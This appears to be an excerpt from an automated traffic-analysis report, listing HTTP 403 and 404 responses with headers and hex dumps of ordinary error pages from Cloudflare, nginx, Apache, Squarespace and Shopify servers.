                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 0fb75597-b8df-42aa-8866-69aa2e5124acCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z2Cx8L1AcPSotNpk4Gl0jDxOsT6Wd%2BDrxAP1cXkxnRZcD1ZMYg9486vQbaiYbYxt0UA1utUtUinax%2BD8L5pvk5aGkJcGJKN2wK%2BMAUdmbT9K%2BcBKD3GD8IXZEYlxbFA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=5104.000092Server: cloudflareCF-RAY: 7a59a7bc2c1e2c51-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:59 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:55:59 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: JAa8T7BD/GRBQVx4JData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Mar 2023 06:56:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:00 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:00 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4KhSVXWyNPI2O9kRnzC%2B%2FQa%2BOoGoytklSASUyqoQSxM%2B6r2pVfZgUqOapHrbnQj7sKu5ttMPwaJ%2BtgqN5nU%2BTx6y6HQzmgweuIEGVbY6fUHhPs9P9d9IyYETVHo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7c61b4a3a72-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:01 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KrGAD2jaIt%2Fd%2B4LuwoVek%2BIj7X7wyxs7%2B6bWivEeXut%2FTMCvhmopDr7%2B69TJ8tPwqYWSVqY3xTpI0emGXdalg96StcbzeZdKcjWzY72iQ60bFi%2Bsf6WFPc60P5g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7c6bb349112-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XaBmkAEdWoN7JxqHgRpBMTO7xVtlbbGkdZ9IJr1RrU9F%2BL34SPEviecdwIGyKO4%2B7MjyXTiULNkRUfZT5QQtIVU14NB4JFFWFj%2FDa2dJz9F5r3IpeUJ84skDgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7e34e899bb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 64 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: 1d33<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cBKxzrvtPvu%2FK7RqaVCoApOgw3Va4b9uVdsxKwNfusGd%2B8tPl7PcX2XKLyfiIhUtwkSA030fl5LK%2FdmQdANJbK8Eps9Mrh1IXf6X7I%2FdeS7eLYciwJNzZrzpy1QWpGjs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7e56af89bb0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xTUmfQz40RhgZsyjEh1%2B50vPgqhYSCIEYktYyg1PXCBGmH3j759JmWlR0EgJw0NVeX1Jvq%2ByuW8s3W3GmEqSzkc43yB9m1sehEYtE4L4%2F9C3iVZhBWj9bvMH7SHxQWRW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7ec4ae69bb0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Mar 2023 06:56:08 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 